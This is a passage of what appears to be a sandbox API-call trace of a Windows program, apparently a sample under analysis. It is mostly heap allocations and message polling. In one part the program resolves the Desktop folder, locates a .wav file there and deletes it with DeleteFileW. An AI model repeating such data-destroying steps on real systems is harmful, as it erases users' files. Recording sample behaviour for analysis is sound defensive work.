(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.169] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.169] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.169] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.169] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.169] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.170] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.170] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.170] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.170] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.170] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.170] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.171] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.171] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.171] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.171] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.171] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.172] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.172] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.172] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.173] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.173] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.173] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.173] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.173] FreeLibrary (hLibModule=0x74d40000) returned 1 [0189.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.173] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.176] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.176] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.177] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.177] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.177] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.178] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/SFHBP1D1LBQEeR.wav", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SFHBP1D1LBQEeR.wav", lpFilePart=0x8bedfc*="SFHBP1D1LBQEeR.wav") returned 0x38 [0189.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0189.178] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SFHBP1D1LBQEeR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfhbp1d1lbqeer.wav")) returned 0x20 [0189.178] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SFHBP1D1LBQEeR.wav", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73e8e610, ftCreationTime.dwHighDateTime=0x1d4caed, ftLastAccessTime.dwLowDateTime=0xf1802160, ftLastAccessTime.dwHighDateTime=0x1d4d1e1, ftLastWriteTime.dwLowDateTime=0xf1802160, ftLastWriteTime.dwHighDateTime=0x1d4d1e1, nFileSizeHigh=0x0, nFileSizeLow=0x13415, dwReserved0=0x79, dwReserved1=0x4, cFileName="SFHBP1D1LBQEeR.wav", cAlternateFileName="SFHBP1~1.WAV")) returned 0xaa5860 [0189.178] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SFHBP1D1LBQEeR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfhbp1d1lbqeer.wav")) returned 1 [0189.180] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73e8e610, ftCreationTime.dwHighDateTime=0x1d4caed, ftLastAccessTime.dwLowDateTime=0xf1802160, ftLastAccessTime.dwHighDateTime=0x1d4d1e1, ftLastWriteTime.dwLowDateTime=0xf1802160, ftLastWriteTime.dwHighDateTime=0x1d4d1e1, nFileSizeHigh=0x0, nFileSizeLow=0x13415, dwReserved0=0x79, dwReserved1=0x4, cFileName="SFHBP1D1LBQEeR.wav", cAlternateFileName="SFHBP1~1.WAV")) returned 0 [0189.180] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0189.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.180] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0189.181] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0189.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.182] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0189.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0189.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0189.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/SFHBP1D1LBQEeR.wav", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SFHBP1D1LBQEeR.wav", lpFilePart=0x8bf658*="SFHBP1D1LBQEeR.wav") returned 0x38 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0189.184] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SFHBP1D1LBQEeR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfhbp1d1lbqeer.wav")) returned 0xffffffff [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.184] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 